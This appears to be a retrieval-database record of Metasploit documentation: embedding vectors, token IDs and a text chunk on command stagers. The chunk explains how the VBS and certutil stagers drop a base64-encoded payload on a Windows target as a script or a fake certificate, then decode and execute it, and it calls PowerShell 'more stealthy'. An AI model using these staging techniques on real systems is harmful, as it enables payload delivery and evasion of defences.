-0.5617570877075195, -0.07106674462556839, 0.12673842906951904, -0.2397729903459549, -0.4604633152484894, 0.5024406313896179, 0.29537609219551086, 0.05484209582209587, 0.7572668790817261, 0.35211971402168274, -0.674189567565918, 0.23846524953842163, -0.04818912222981453, -0.09967464953660965, 0.10839711129665375, 0.14824847877025604, 0.5715895891189575, 0.01987280324101448, 1.2767267227172852, -0.5245750546455383, -0.6047375202178955, 0.3363998830318451, -0.1871231496334076, 0.3589688241481781, -0.3319430351257324, -0.000774753512814641, -0.024141432717442513, -0.4538140892982483, -0.11559412628412247, 0.3517356514930725, 0.4623480439186096, 0.6023446321487427, -0.050515469163656235, 0.7458558678627014, -0.4744090735912323, 0.20790675282478333, 0.6727162599563599, -0.6820268034934998, -0.5337517857551575, 0.9531106948852539, 0.18545030057430267, 0.5686245560646057, -0.547321081161499, -0.269587904214859, 0.3181983232498169, 0.7015762329101562, 0.32508382201194763, -0.2911449670791626, -0.34522607922554016, -0.46852585673332214, -0.4848736524581909, 0.20974892377853394, -0.514977753162384, -0.17203469574451447, 0.22779805958271027, 0.6577606201171875, -0.04715190455317497, -0.6662957668304443, -0.3405621647834778, 0.5943784713745117, 0.8599789142608643, 0.925588846206665, 0.4953877627849579, 0.7749456763267517, -0.0208060834556818, -0.4522659182548523, 0.34066838026046753, -0.24849791824817657, 0.0865766778588295, -0.28807103633880615, 0.25464028120040894, -0.11521980911493301, 0.369660347700119, 0.3315804600715637, 0.34735408425331116, -0.33984512090682983, 0.21516209840774536, -0.5648233890533447, -0.28686240315437317, -0.427631676197052, 0.1527690440416336, -0.09258478134870529, -0.14940795302391052, -0.49500134587287903, -0.11909524351358414, -0.3861900568008423, 0.7581338882446289, 0.13323746621608734, -0.7868029475212097, -0.49475935101509094, -0.33026212453842163, 0.496923565864563, 0.3086446225643158, 0.18628515303134918, -0.6474099159240723, -0.7194561958312988, -0.5865362882614136, -0.8699248433113098, -0.0019179960945621133, 0.08968176692724228, 0.6057595014572144, -0.1386886090040207, -1.01874577999115, 0.01629139482975006, 0.2585808336734772, -0.060248035937547684, -0.8429880738258362, -0.0666346326470375, 0.03897780179977417, 0.6096867918968201, 0.7728249430656433, -0.19982431828975677, -0.3980245590209961, -0.09974585473537445, -0.7941710352897644, 0.14652258157730103, -0.9290110468864441, -0.09111981838941574, 0.5106457471847534, -0.05510764196515083, -0.17804238200187683, -0.551133394241333, -0.4879734516143799, -0.7845073938369751, -0.28855031728744507, 0.41690096259117126, -0.6354330778121948, -0.3736141324043274, 0.7535542249679565, -0.48234277963638306, -0.7198516726493835, 0.3803795278072357, 0.4259377121925354, -0.006365854758769274, 0.31085115671157837, -0.3236885666847229, -0.03855682536959648, 0.15991905331611633, -0.5776453018188477, 0.38425615429878235, 0.07918412983417511, 0.2999784052371979, 0.0035020681098103523, -0.3590850830078125, 0.8158872127532959, 0.4012558162212372, 0.14731848239898682, -0.6618379354476929, -0.5512094497680664, 0.4614189863204956, 0.3702523708343506, 0.1613103747367859, -0.22749261558055878, 0.20204856991767883, 0.07839562743902206, 0.054200999438762665, -0.5300131440162659, -0.9156061410903931, -0.9622155427932739, -0.1356099545955658, -0.19411201775074005, 0.27353233098983765, 0.3687419593334198, 0.3501829504966736, -0.18764628469944, -0.12062840163707733, -0.009353305213153362, -0.06589818745851517, 0.09591370075941086, -0.2620474398136139, -0.0029505514539778233, -0.5673375129699707, 0.15903018414974213, -0.03831958398222923, 0.47106412053108215, 0.012570975348353386, 0.19960366189479828, 0.07927195727825165, 0.38265615701675415, 0.37506547570228577, -0.18562689423561096, -0.6444424390792847, 0.13169214129447937, -0.12948738038539886, -0.12608636915683746, -0.14997254312038422, 0.38920482993125916, -0.5438851714134216, 0.30362069606781006, -0.021167373284697533, -0.8284012675285339, -1.0812807083129883, -0.9087653756141663, 0.19852176308631897, 0.04135974124073982, -0.2352716028690338, -0.3552086651325226, -0.6822988390922546, -0.44362372159957886, 0.2349473536014557, 0.5167591571807861, -1.116653323173523, -0.22964829206466675, -0.3429875075817108, -0.12291887402534485, 0.0046181934885680676, -0.07920973002910614, 0.26372891664505005, -1.2132986783981323, -0.5104607343673706, 0.6466614007949829, 0.4265952408313751, -0.3145202696323395, -0.15888512134552002, -0.10280253738164902, 0.6487625241279602, 0.07303798198699951, -0.604569673538208, -0.5749700665473938, -0.4364416003227234, -0.008595447055995464, -0.32677242159843445, 0.10676021128892899, -0.37635818123817444, 0.8332940936088562, -0.4555155038833618, 0.38704198598861694, 0.018465999513864517, 0.23400478065013885, -0.21651983261108398, 0.007958975620567799, 0.5147090554237366, -0.5188920497894287, 0.6568138599395752, -0.6224316954612732, 0.7864781022071838, 0.24306908249855042, -0.04555843397974968, -0.8911550641059875, 0.626671552658081, -0.5105755925178528, -1.0531928539276123, 0.852483868598938, 0.16966141760349274, -0.23547324538230896, 0.6343185901641846, -0.2842809557914734, 0.9151237607002258, -0.8925183415412903, 0.6028910875320435, 0.6683118939399719, 0.4444102644920349, -0.24155405163764954, 0.01338990218937397, 0.2983786463737488, 0.41402021050453186, -0.1472834348678589, 0.2805248498916626, 0.019937101751565933, -0.0008340406930074096, 0.05343077331781387, -0.36045363545417786, 0.20504634082317352, -0.037001803517341614, -0.6648687720298767, 0.5085517168045044, -0.29858076572418213, 0.8694759607315063, -0.42455124855041504, -0.695851743221283, -0.21790051460266113, 0.41306257247924805, 0.31208425760269165, 0.06664945185184479, 0.1949961930513382, 0.3786858022212982, 0.5646630525588989, -0.2391916811466217, 0.07437263429164886, -0.21971850097179413, -0.23981183767318726, 0.5469017028808594, -0.025859862565994263, -1.0359151363372803, 1.096189260482788, 0.29472577571868896, -0.8163045048713684, -0.21193447709083557, -0.3448650538921356, -0.2653656005859375, -0.11242493987083435, -0.2707141935825348, -0.93623948097229, -0.07184229046106339, 0.47784921526908875, 0.16563962399959564, 0.5161741971969604, -0.18607087433338165, 0.6049819588661194, -0.9688001871109009, 0.04834161326289177, 0.022661572322249413, 0.8112385272979736, 0.7691754102706909, -0.805550217628479, -0.42801111936569214, -0.7031291723251343, 0.18972566723823547, 0.40328267216682434, 0.17576751112937927, 0.49196016788482666, 0.37627267837524414, 0.4445144534111023, 0.33732494711875916, -0.2336469292640686, 0.8327011466026306, -0.33614209294319153, 0.2827461361885071, 0.41619110107421875, -0.19031070172786713, -0.9754647016525269, -0.6879323720932007, -0.2691371440887451, 0.17508642375469208, 0.7509430050849915, -0.15740756690502167, -0.21164613962173462, 0.11671113222837448, -0.27143892645835876, -0.1371513456106186, -0.8534049987792969, -0.6895200610160828, -0.8912016153335571, -0.27879148721694946, 0.22945527732372284, -0.1401919722557068, 0.0873146802186966, 0.07285458594560623, -0.46877115964889526, -0.40870800614356995, -1.0423691272735596, 0.4021613597869873, -0.052001889795064926, -0.1742563098669052, -0.17404760420322418, 0.7410286664962769, -0.557597815990448, -0.3339748680591583, -0.30571669340133667, -0.14806456863880157, -0.3950132727622986, -0.8233231902122498, 0.057106535881757736, 0.3362780511379242, -0.29621973633766174, 0.46595171093940735, -0.3947453498840332, -0.553061306476593, 0.4901077449321747, -1.0620532035827637, 0.7902001142501831, 1.0696690082550049, -0.6593999862670898, 0.5051328539848328, 0.2715703248977661, -0.16617731750011444, 0.2742057740688324, -0.6374803781509399, 0.29242026805877686, -0.5222654938697815, 0.2865883409976959, 0.4433082938194275, 0.5032702684402466, -0.9206975102424622, 0.13520969450473785, -0.23973293602466583, -0.455770879983902, 0.1008242815732956, -0.7375230193138123, -0.011273122392594814, -0.06796270608901978, -0.6524028778076172, 0.0028174198232591152, 0.6331862211227417, 0.5509099364280701, 0.7976248264312744, -0.39700552821159363, 1.07746160030365, 0.4788144528865814, 0.0988929271697998, 0.29059693217277527, 0.006328372750431299, 0.3255453407764435, 0.17542634904384613, 0.1946922391653061, 0.10162996500730515, -0.12905378639698029, 0.6076266169548035, 0.0707676038146019, -0.286895751953125, -0.2581051290035248, 0.17862378060817719, -0.07095153629779816, 0.7199620604515076, -0.46332910656929016, -0.14897450804710388, 0.6658271551132202, -0.6354004144668579, -0.802946150302887, -0.3037130832672119, -0.9782045483589172, 0.44798964262008667, 0.08425076305866241, -0.03012849949300289, 0.03718499839305878, -0.04238230362534523, -0.14888276159763336, -0.2623775899410248, -0.007875087670981884, 0.08697377890348434, 0.5354894995689392, -0.12179828435182571, 0.05291704833507538, 0.9646786451339722, -0.510022759437561, -0.2634788155555725, 0.04746974632143974, -0.08157035708427429, -0.6291120648384094, -1.2008426189422607, 0.19949118793010712, 0.4203898012638092, 0.3852657377719879, 0.3948217034339905, -0.38562068343162537, -0.08736217767000198, 0.11824604123830795, 0.020639577880501747, 0.04588054120540619, 0.10297486186027527, -0.3056226372718811, 0.5852289199829102, 0.05624772235751152, 0.31402745842933655, 0.2705177962779999, -0.35149016976356506, -0.006281452253460884, -0.02698945812880993, -0.3078153729438782, 0.7500746250152588, -0.061107855290174484, 0.4579762816429138, 0.5187371969223022, 0.9797437787055969, 0.635233461856842, -0.27862662076950073, -0.06241997703909874, -0.5033432841300964, 0.5141284465789795, -0.10581953823566437, 0.5059247016906738, -0.30864283442497253, 0.4855336844921112, 0.774307906627655, -1.0839018821716309, -0.1701309084892273, 0.5237051248550415, -0.3848536014556885, -0.3403811454772949, 0.039424534887075424, -0.6888830661773682, 0.37671148777008057, 0.15194377303123474, -0.383666068315506, 0.29651713371276855, -0.12586230039596558, 0.4776841998100281, -0.2524232268333435, 0.013689850457012653, 0.4231005907058716, -0.8715818524360657, -0.04378143697977066, 0.3591492772102356, -0.060299620032310486, 0.4806080460548401, 0.33890464901924133, -0.8649268746376038, 0.28504326939582825, 1.113365888595581, 0.6953277587890625, -0.48239949345588684, 0.5115910768508911, -0.47114938497543335, 0.44351819157600403, -0.020782895386219025, -0.39623868465423584, -0.3143805265426636, 0.5735001564025879, 0.25220787525177, -0.3814064860343933, -0.8050174117088318, 0.425650954246521, 0.2093360722064972, 0.7776512503623962, 0.2598375678062439, 0.012045842595398426, 0.26548710465431213, -0.2949199378490448, 0.6017187237739563, -0.5408408045768738, 0.1482522040605545, 0.45250964164733887, -0.5381773710250854, -0.4118756651878357, 0.8053845167160034, 0.3423689305782318, 0.4455782175064087, -0.2860572040081024, 0.9145586490631104, 0.03460024669766426, 0.08066599816083908, 0.1379324048757553, -0.09268812835216522, -0.7112173438072205, 0.3076436221599579, -0.1820901781320572, -0.8144968748092651, 0.26148805022239685, 0.014871708117425442, 0.4274502694606781, -0.19657683372497559, -0.17640025913715363, -0.36501049995422363, 0.2333301454782486, -0.018848823383450508, -0.2407470941543579, 0.5044915676116943, -0.13122375309467316, -0.5746700167655945, 0.14205339550971985, 0.14774879813194275, 0.15629632771015167, 0.32892361283302307, -0.04387406259775162, -1.202571153640747, -0.3122187554836273, -0.2963404357433319, -0.5908229947090149, 1.240437388420105, -0.4182513654232025, -0.1169392541050911, 0.08047401905059814, -1.0128613710403442, -0.5078276991844177, 0.2491310089826584, -0.6156927943229675, -0.4335418939590454, 0.5708042979240417, 0.5916442275047302, 0.3400551378726959, 0.2634080946445465, -0.18315735459327698, -0.6131060719490051, 0.29958876967430115, 0.6379924416542053, -0.38105589151382446, 0.30124178528785706, -0.17013195157051086, 0.38822728395462036, 0.3378138542175293, -0.45134031772613525, 0.15597286820411682, -0.17249296605587006, -0.24130283296108246, -0.31604570150375366, 0.02863522619009018, -1.1625248193740845, -0.592272162437439, -0.06517188251018524, -0.1419660896062851, 0.7758107781410217, -0.3750772476196289, -0.8556441068649292, 0.09069368243217468, -0.30894172191619873, -0.3802907466888428, -0.24276047945022583, -0.286786824464798, 0.38254261016845703, 0.10102085769176483, 0.2922530174255371, -0.6949588060379028, 4.388903617858887, 0.1441386342048645, 0.4463551342487335, 0.3343517482280731, -0.1688643842935562, 0.15808527171611786, 1.1431739330291748, -0.6237314939498901, 0.3081321716308594, -0.5042858719825745, 0.003892504144459963, -0.4358929395675659, 0.39584702253341675, 1.0146934986114502, 0.6810213923454285, -0.010565409436821938, -0.749677836894989, -0.16262634098529816, 0.2731174826622009, -1.0519134998321533, -0.7726666331291199, 0.04004323482513428, -0.1279699057340622, 1.0086612701416016, 0.34820640087127686, 0.033933863043785095, 0.7955029010772705, -0.6644746661186218, 0.42991024255752563, -0.22321736812591553, -0.012090889737010002, -0.3696358799934387, 0.1491617113351822, -0.22604601085186005, -0.33276087045669556, -0.248075470328331, -0.07120466232299805, -0.741262674331665, -0.7560814023017883, -0.8419371843338013, 0.3850603997707367, 0.5515870451927185, 0.14085422456264496, -0.6003350615501404, 0.12909486889839172, 0.9464505314826965, -0.6753088235855103, 0.29924437403678894, 0.6760109066963196, -0.7898036241531372, 0.3825198709964752, -0.01961076259613037, 0.8323922157287598, -0.04435231164097786, -0.8703322410583496, 0.22633996605873108, 0.08016745746135712, -0.14938700199127197, 0.1107087954878807, 0.1477610468864441, 0.5701154470443726, -0.44614991545677185, 0.5748047828674316, 0.11790607869625092, -0.7798393368721008, 0.38289979100227356, -0.3002445697784424, -0.49580225348472595, -0.0030991886742413044, -0.3389253318309784, -0.20541387796401978, 0.14802783727645874, -0.2679506540298462, -0.11319064348936081, 0.7060909271240234, -0.07592423260211945, 0.06375470757484436, 0.3480716645717621, 0.44194260239601135, -0.5097845792770386, -0.33852577209472656, -0.8106468915939331, -1.07570219039917, 0.4879898428916931, 0.6315387487411499, 0.25134164094924927, 0.18790453672409058, -0.7721477746963501, -0.11981803178787231, 0.146316796541214, 0.4671359360218048, 0.11974532902240753, 0.26117435097694397, 0.9330695867538452, 0.22590622305870056 ]
[ 4642, 2094, 1010, 1035, 23569, 2015, 1027, 1063, 1065, 1007, 4604, 1035, 5227, 1035, 1039, 5856, 1006, 1063, 1005, 4118, 1005, 1027, 1028, 1005, 2131, 1005, 1010, 1005, 24471, 2072, 1005, 1027, 1028, 1005, 1013, 17852, 1012, 25718, 1005, 1010, 1005, 4372, 16044, 1035, 11498, 5244, 1005, 1027, 1028, 6270, 1010, 1005, 13075, 2015, 1035, 2131, 1005, 1027, 1028, 1063, 1005, 12997, 1005, 1027, 1028, 1000, 13029, 1012, 1014, 1012, 1014, 1012, 1015, 1009, 1003, 2656, 1003, 2656, 1009, 1001, 1063, 11307, 1035, 2919, 1035, 25869, 2015, 1006, 4642, 2094, 1007, 1065, 1000, 1065, 1065, 1007, 2203, 13366, 18077, 6140, 1035, 3570, 1006, 1005, 18077, 2075, 1012, 1012, 1012, 1005, 1007, 15389, 1035, 4642, 5104, 26702, 2099, 2203, 1998, 2292, 1521, 1055, 2448, 2008, 1010, 2057, 2323, 2031, 1037, 5806, 1024, 5796, 2546, 18077, 1006, 4642, 5104, 26702, 2099, 1035, 9703, 1007, 1028, 2448, 1031, 1008, 1033, 2318, 7901, 22975, 2361, 28213, 2006, 2184, 1012, 1020, 1012, 1014, 1012, 6227, 1024, 4008, 22932, 1031, 1008, 1033, 18077, 2075, 1012, 1012, 1012, 1031, 1008, 1033, 23820, 7783, 2754, 2099, 2005, 2058, 1011, 7451, 2754, 1012, 1012, 1012, 1006, 8746, 27507, 1007, 1031, 1008, 1033, 6016, 2754, 1006, 17332, 24087, 2683, 2683, 27507, 1007, 2000, 2184, 1012, 1020, 1012, 1014, 1012, 6227, 1031, 1008, 1033, 8316, 28139, 3334, 5219, 1015, 2441, 1006, 2184, 1012, 1020, 1012, 1014, 1012, 6227, 1024, 4008, 22932, 1011, 1028, 2184, 1012, 1020, 1012, 1014, 1012, 6227, 1024, 4868, 25746, 2475, 1007, 2012, 2355, 1011, 5757, 1011, 2184, 2340, 1024, 4868, 1024, 6021, 1011, 28714, 2692, 26389, 19779, 2008, 2057, 2113, 2129, 2000, 2224, 1996, 5796, 2546, 1024, 1024, 18077, 1024, 1024, 4642, 5104, 26702, 2099, 4666, 2378, 1010, 2292, 1521, 1055, 2202, 1037, 2298, 2012, 1996, 3094, 2754, 2869, 2017, 2064, 2224, 1012, 2004, 3855, 2682, 2045, 2024, 1016, 2236, 8107, 2000, 15308, 2019, 4654, 8586, 23056, 2006, 9785, 1024, 2011, 1999, 22776, 1037, 3094, 2008, 2097, 8816, 1996, 4654, 8586, 23056, 5371, 2000, 9785, 2066, 1059, 18150, 1010, 15390, 1010, 2030, 18584, 1010, 2030, 2011, 4911, 1996, 4654, 8586, 23056, 5371, 2046, 4109, 1998, 2164, 2068, 10954, 3209, 2000, 4339, 2009, 2000, 9785, 2066, 9052, 1010, 6140, 2546, 1010, 2030, 1058, 5910, 1012, 2023, 3972, 3170, 3370, 2064, 2022, 2590, 1010, 2004, 2667, 2000, 4339, 1037, 2754, 3238, 12441, 18093, 2000, 9785, 2478, 1037, 2754, 2099, 2008, 2038, 2000, 2421, 1996, 20000, 2098, 18093, 1999, 2009, 2097, 5478, 1996, 7781, 1997, 9877, 1997, 10954, 1010, 2411, 2169, 2028, 2383, 1996, 8085, 1997, 1996, 18077, 1012, 2009, 2003, 2036, 6179, 2000, 2113, 1996, 6140, 2546, 14894, 2003, 1996, 2069, 14894, 2008, 7861, 8270, 2015, 1996, 18093, 2046, 1996, 10954, 2021, 2515, 2025, 2224, 9052, 1012, 2800, 26389, 1024, 26389, 9034, 1996, 18093, 2000, 2022, 3714, 4237, 1998, 11157, 2046, 1996, 10954, 1024, 15803, 17119, 8525, 3775, 17920, 8569, 2290, 1035, 2004, 26876, 15878, 15916, 1035, 4339, 15937, 7361, 6657, 24475, 26493, 22747, 14973, 5668, 2008, 11160, 2006, 2478, 1037, 3094, 2000, 12850, 1996, 18093, 3081, 2897, 4434, 10841, 12190, 7959, 10649, 2140, 2860, 28139, 15500, 4523, 2232, 1035, 1999 ]
metasploit
107.txt
6
##vokewebrequesttftpwget vbs command stager - windows onlythe vbs command stager is for windows. what this does is it encodes our payload with base64, save it on the target machine, also writes a vbs script using the echo command, and then lets the vbs script to decode the base64 payload, and execute it. if you are exploiting windows that supports powershell, then you might want to consider using that instead of the vbs stager, because powershell tends to be more stealthy. to use the vbs stager, either specify your cmdstagerflavor in the metadata :'cmdstagerflavor'= > ['vbs'] or set the : vbs key to execute _ cmdstager : execute _ cmdstager ( flavor : : vbs ) you will also need to make sure the module ’ s supported platforms include windows ( also in the metadata ), example :'platform'= >'win'certutil command stager - windows onlycertutil is a windows command that can be used to dump and display certification authority, configuration information, configure certificate services, back up and restore ca components, etc. it only comes with newer windows systems starting from windows 2012, and windows 8. i find the certutil flavor confusing, as certutil can be used to download files just like wget and ftp, we don't use it that way here ; instead we use echo to write the file as a base64 encoded certificate, and then we use certutil to decode it prior to execution : echo - - - - - begin certificate - - - - - > encoded. txt echo just base64 encode your binary data echo tvoaaa = = > > encoded. txt echo - - - - - end certificate - - - - - > > encoded. txt certutil - decode encoded. txt decoded. bin to take advantage of that, the certutil command stager will save the payload in base64 as a fake certificate, ask certutil to decode it, and then finally execute it. to use the certutil command stager, either specify your cmdstagerflavor in the metadata :'cmdstagerflavor'= > ['certutil'] or set the : certutil key to execute
[ 0.078989177942276, -0.6876184344291687, 0.10176799446344376, 1.3819156885147095, 0.07638191431760788, -0.4741624891757965, -0.7894855737686157, 0.7480509281158447, 0.23295414447784424, 0.09508586674928665, -0.5448669195175171, -0.19679845869541168, 0.31583285331726074, -0.8856611251831055, -0.1036950945854187, -0.42689841985702515, -0.47576701641082764, -0.6233383417129517, -1.198671817779541, -0.18786311149597168, -0.6541219353675842, -0.4732804596424103, -0.6195724606513977, -0.8783904910087585, -0.13015173375606537, 0.380628377199173, 0.1529289036989212, 0.14164789021015167, 0.44091397523880005, 0.6389265656471252, 0.7503881454467773, -0.6073557734489441, 0.21657156944274902, -0.4937164783477783, 0.5470439791679382, 0.39072492718696594, 0.5616603493690491, -0.17967112362384796, 0.16292931139469147, -0.8059502840042114, 0.7597872018814087, 0.2270960807800293, 0.2382797747850418, -0.2939509153366089, -1.023747205734253, -0.6192476153373718, 0.5594745874404907, -0.12465482205152512, 0.4642007052898407, 0.3175845742225647, 0.012690681964159012, 0.23314549028873444, -0.40207749605178833, -0.09778179228305817, -0.04227973520755768, -0.049187276512384415, -0.14739015698432922, 0.0950818657875061, 0.04544418305158615, 0.11946232616901398, -0.02128521353006363, 0.36912015080451965, 0.21183525025844574, -0.45137763023376465, -0.453847736120224, 0.12735536694526672, 0.048350851982831955, -0.8270657062530518, -0.12196158617734909, -0.03524325415492058, 0.25101926922798157, 0.5843505859375, -0.24844926595687866, -0.20893718302249908, -0.1028532087802887, 0.16329334676265717, -0.4460337162017822, -0.0596647635102272, -0.14609770476818085, 0.485801637172699, -0.004225598182529211, 0.20039822161197662, 0.6047837138175964, -0.34665438532829285, -0.08738958090543747, -0.9196615219116211, 0.8354966640472412, 0.7857180833816528, -0.5510695576667786, 0.18440817296504974, 0.6044988632202148, 0.08412890881299973, -0.7977479100227356, -0.11979292333126068, 0.12797534465789795, 0.39227768778800964, -0.5061940550804138, -0.17952220141887665, 0.6522811651229858, -0.3309028446674347, 0.7498390674591064, 0.570862889289856, 0.3428213894367218, 0.08347035199403763, -0.4722030758857727, 0.45985493063926697, 0.8029671907424927, -0.6804593801498413, -0.5838545560836792, -0.9130654335021973, 0.8389894962310791, 0.09609848260879517, 0.24196365475654602, -0.6370183229446411, -0.18397678434848785, 0.6201642751693726, 0.6431832909584045, -0.18072661757469177, -0.8595019578933716, 0.6703909635543823, 0.2627655267715454, -0.14155858755111694, 0.46864813566207886, -0.716869592666626, 0.6351087093353271, -0.5336465835571289, 0.23297587037086487, 0.4002799987792969, -0.7849424481391907, -0.9801556468009949, 0.0498916357755661, -0.26982954144477844, -0.40153855085372925, 0.7039968371391296, -0.23132121562957764, 0.8230487108230591, -0.17731142044067383, -0.2127140909433365, 1.0658531188964844, -0.8218820691108704, 0.012498850002884865, 0.19068840146064758, 0.2594384253025055, 1.2478628158569336, -0.036286283284425735, -0.31462186574935913, 0.023608891293406487, 0.09271541237831116, -0.2627182900905609, 0.8181320428848267, -0.29826247692108154, 0.3191738426685333, 0.186543807387352, -0.2253626585006714, -0.18567107617855072, 0.12508654594421387, -0.02256782352924347, 0.5449926257133484, -0.4572330415248871, -0.07393372803926468, 0.021132942289114, 0.8020520210266113, -0.1334558129310608, -0.03686392679810524, -0.03825600445270538, 0.22554650902748108, -0.22829784452915192, -0.4648316204547882, -0.608811616897583, 0.034123823046684265, 0.09703963249921799, -0.13622131943702698, -0.19136099517345428, 0.35128116607666016, 1.4937273263931274, 0.791408896446228, 0.1385432481765747, -0.06821664422750473, 0.37840306758880615, 0.3571165204048157, -1.1685237884521484, 0.4740782678127289, 0.3608540892601013, 1.2792887687683105, -0.5576837062835693, 0.1319495439529419, 0.19833843410015106, -0.13854491710662842, -0.3279837965965271, 0.26432591676712036, 0.06260285526514053, 0.6779863834381104, -0.21902216970920563, 0.542975127696991, 0.7490532398223877, 0.4893420338630676, -0.873088002204895, 0.2220521718263626, -0.6921070218086243, -1.343863844871521, -0.3763629198074341, 0.17127445340156555, 0.18172511458396912, 0.3999246656894684, -0.2884911000728607, -0.4640173316001892, 1.0295108556747437, 0.10776752978563309, -0.029648203402757645, 0.45962589979171753, 0.8044791221618652, -0.04402310028672218, -0.46697884798049927, 0.05355159565806389, -0.1948712319135666, 0.34887266159057617, -0.5163888931274414, 0.3236691951751709, 0.07041869312524796, 0.5959985852241516, 0.2842857837677002, 0.29037246108055115, 0.9684163331985474, 0.4782821238040924, -0.10217905044555664, -0.836650013923645, 0.3289444148540497, 0.1940814107656479, -0.44677332043647766, -0.02423900179564953, -0.2807237505912781, 0.29609161615371704, 0.32938387989997864, 0.5450656414031982, 0.6118531823158264, 0.0019024577923119068, 0.1283998191356659, -0.06750783324241638, -0.15942957997322083, 0.16021494567394257, -0.20946457982063293, 0.5010305047035217, 0.3596545457839966, 0.6946828365325928, 0.12510399520397186, 0.2554246187210083, -0.23198379576206207, -0.204105943441391, 0.32034000754356384, 0.05811423063278198, -0.21631315350532532, 0.7030135989189148, -0.34497886896133423, 0.005770597606897354, -0.4163629710674286, -0.4337058663368225, 0.7217680811882019, 0.8789200186729431, -1.1330243349075317, -0.8241994976997375, -0.036515843123197556, 0.45972776412963867, -0.5355425477027893, 0.17202726006507874, 0.39056652784347534, 0.8645752668380737, -0.11140794306993484, 0.28141987323760986, -0.018734397366642952, -0.7774328589439392, -0.4208831489086151, -0.43237102031707764, -0.4942494332790375, -0.8935610055923462, -0.5367245674133301, 0.11243118345737457, 0.15635526180267334, -0.4085789620876312, 0.15866562724113464, -0.38733893632888794, -0.5177053213119507, 0.050463829189538956, 0.4921722114086151, 0.6182458996772766, 0.2403440624475479, -0.4978926181793213, -0.8560805916786194, 0.6998319625854492, 0.06280378997325897, 0.4584062099456787, -0.46560773253440857, -0.4190673232078552, 0.20775745809078217, -0.3064914345741272, -0.7125677466392517, -0.6937865614891052, 0.3766080439090729, 0.259710431098938, 0.19856202602386475, -0.12375190109014511, 0.03663197159767151, 0.45425382256507874, 0.14230157434940338, 0.7374233603477478, -0.7320948243141174, 0.7475177645683289, 0.21189068257808685, -0.5252647995948792, 0.2795444130897522, 0.9332989454269409, -1.0603922605514526, 0.5392066836357117, 0.11252544820308685, 0.3796624541282654, -0.5089742541313171, 0.9166857600212097, 0.6055154204368591, 0.11443403363227844, -0.5610280632972717, -0.002570658689364791, 0.3813929259777069, -0.13497209548950195, -0.18664763867855072, -0.2695753574371338, -0.6780992150306702, 0.7478570342063904, 0.10321688652038574, -0.6633718013763428, 0.8558085560798645, -0.21669703722000122, 0.5003671050071716, -0.1691201627254486, -0.5212661623954773, 0.49314746260643005, -0.2187228500843048, 0.08709751814603806, -0.2946341335773468, -0.38708287477493286, 0.18397057056427002, 0.4704609215259552, -0.15972070395946503, -0.17831549048423767, 0.4077734649181366, 0.2456798255443573, -0.31171083450317383, 0.455610990524292, 0.5118025541305542, -0.7868281006813049, -0.2334529161453247, -0.5939099788665771, -0.2469928115606308, 0.21321901679039001, 0.5972181558609009, 0.30243992805480957, 0.24523498117923737, 0.728247344493866, -0.8256967663764954, -0.6408066153526306, 0.5915424823760986, 0.18714843690395355, -0.19301757216453552, -0.06995051354169846, 0.2473529875278473, 0.1573428213596344, -0.45451346039772034, -0.4809481203556061, 0.604459822177887, 0.40128570795059204, 0.350655198097229, -0.5244396328926086, 0.5092162489891052, -0.038886405527591705, -0.2748083770275116, 0.22344812750816345, -0.4877556562423706, -0.03200085833668709, 0.8414400815963745, -0.09034939855337143, 0.33641332387924194, -0.11173047125339508, 0.6085976958274841, -0.7742481231689453, -0.29318690299987793, -0.0018179991748183966, 0.03724380210042, -0.5999987125396729, -0.05079532787203789, -0.6156588792800903, 0.29145240783691406, -0.13706137239933014, -0.05767640098929405, -0.40578314661979675, 0.13055190443992615, -0.6609703898429871, -0.520607054233551, -0.352656751871109, 0.43705329298973083, 0.733107328414917, 0.3515039086341858, 0.7470909357070923, 0.836424708366394, -0.10043405741453171, -0.8082662224769592, 0.6682038307189941, -0.3040139079093933, 0.30503949522972107, -0.04341353848576546, 0.5841585993766785, -0.45652902126312256, 0.8482840061187744, -0.0058414507657289505, 0.16401787102222443, -0.697239100933075, 0.4744148850440979, -0.2312980741262436, 0.025985203683376312, -1.0293697118759155, -0.2124418020248413, -0.45786139369010925, 0.22924493253231049, -0.43518778681755066, -0.38887274265289307, -0.2474977821111679, 1.2541608810424805, 0.3805106282234192, -0.7786282896995544, -0.9587543606758118, -0.4755406677722931, 0.727592945098877, 0.14890256524085999, 0.010787812061607838, -0.26784196496009827, -0.7504640817642212, -0.6567521691322327, -0.5489392280578613, 0.5470417141914368, 0.17457473278045654, 0.6648573875427246, 0.03295276686549187, -0.9105662703514099, -0.17593443393707275, 0.2368229180574417, 0.16278241574764252, -0.5116351842880249, -0.3384838104248047, 0.803203284740448, 0.7803299427032471, 0.4770800471305847, -0.48264291882514954, -0.7388169169425964, -0.12556137144565582, -0.9646049737930298, 0.45965084433555603, -0.571944534778595, 0.08505620807409286, -0.09438098967075348, -0.13623590767383575, 0.027702180668711662, 0.16572025418281555, 0.13974031805992126, -0.2633261978626251, -0.5380163192749023, 0.39867687225341797, -0.46386444568634033, 0.21854594349861145, 0.8699628114700317, -0.4147682785987854, -0.02808348461985588, 0.3325538635253906, 0.34228572249412537, 0.08644785732030869, 0.7515323758125305, -0.210313081741333, -0.4042127728462219, 0.16282913088798523, -0.6793935894966125, 0.7197921276092529, -0.05606396868824959, 0.48883697390556335, -0.474790096282959, 0.10236077010631561, 0.7948780655860901, 0.0056814090348780155, 0.14665070176124573, -1.2391092777252197, -0.63424152135849, 0.14216211438179016, 0.47911137342453003, 0.33822476863861084, -0.16433286666870117, -0.07313895970582962, 0.34631702303886414, -0.07953815162181854, -0.4759400188922882, -0.5972366333007812, -0.33096182346343994, -0.06799466907978058, -0.5736175775527954, -0.02174031175673008, 0.13121932744979858, 0.5497139692306519, -0.6062194108963013, -0.458798348903656, 0.4667305052280426, -0.3058762848377228, -0.22938889265060425, -0.7034952044487, 0.04410950094461441, -0.4410300552845001, -0.014573300257325172, -0.27029284834861755, 0.4213666319847107, -0.49014201760292053, 0.06975696235895157, 0.42707559466362, 0.6890318989753723, 0.09073714166879654, -0.24505604803562164, -0.20962224900722504, 0.09912693500518799, -0.04205787926912308, -0.262058824300766, 0.12316566705703735, 0.39903005957603455, -0.4813199043273926, 0.5034406185150146, -0.41546696424484253, -0.2696722447872162, -1.135578989982605, -0.9082552194595337, 0.3458816111087799, -0.3018346428871155, 0.13121366500854492, -0.5152824521064758, -0.844022274017334, -0.7603305578231812, 0.36652761697769165, 0.2578434646129608, -1.3673665523529053, -0.5042065382003784, -0.061674363911151886, 0.0744628831744194, -0.39132460951805115, 0.15315651893615723, 0.031496576964855194, -0.8988901376724243, -0.3284948468208313, -0.05095861479640007, 